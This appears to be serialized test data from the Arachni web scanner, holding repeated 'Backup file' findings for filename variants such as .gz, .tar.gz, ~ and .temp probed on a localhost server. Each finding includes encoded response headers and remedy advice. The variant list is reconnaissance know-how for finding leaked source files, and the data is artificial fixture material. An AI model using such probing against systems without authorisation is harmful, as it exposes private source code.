mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.ZIP injected: some_filename.php.ZIP id: some_filename.php.ZIP elem: path remarks: {} method: '' response: some_filename.php.ZIP headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.gz elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.gz injected: some_filename.php.gz id: some_filename.php.gz elem: path remarks: {} method: '' response: some_filename.php.gz headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjA= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.gz elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.gz injected: some_filename.gz id: some_filename.gz elem: path remarks: :stuff: - Blah - Blah2 method: '' response: some_filename.gz headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.tar.gz elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.tar.gz injected: some_filename.php.tar.gz id: some_filename.php.tar.gz elem: path remarks: {} method: '' response: some_filename.php.tar.gz headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjQ= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.tar.gz elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.tar.gz injected: some_filename.tar.gz id: some_filename.tar.gz elem: path remarks: {} method: '' response: some_filename.tar.gz headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjA= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.000 elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.000 injected: some_filename.000 id: some_filename.000 elem: path remarks: {} method: '' response: some_filename.000 headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php~ elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php~ injected: some_filename.php~ id: some_filename.php~ elem: path remarks: :stuff: - Blah - Blah2 method: '' response: some_filename.php~ headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename~ elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename~ injected: some_filename~ id: some_filename~ elem: path remarks: {} method: '' response: some_filename~ headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTQ= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php~1 elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php~1 injected: some_filename.php~1 id: some_filename.php~1 elem: path remarks: {} method: '' response: some_filename.php~1 headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTk= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename~1 elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename~1 injected: some_filename~1 id: some_filename~1 elem: path remarks: {} method: '' response: some_filename~1 headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTU= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: true references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.temp elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: true references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.temp injected: some_filename.php.temp id: some_filename.php.temp elem: path remarks: {} method: '' response: some_filename.php.temp headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.cs elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.cs injected: some_filename.php.cs id: some_filename.php.cs elem: path remarks: {} method: '' response: some_filename.php.cs headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjA= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.temp elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.temp injected: some_filename.temp id: some_filename.temp elem: path remarks: {} method: '' response: some_filename.temp headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
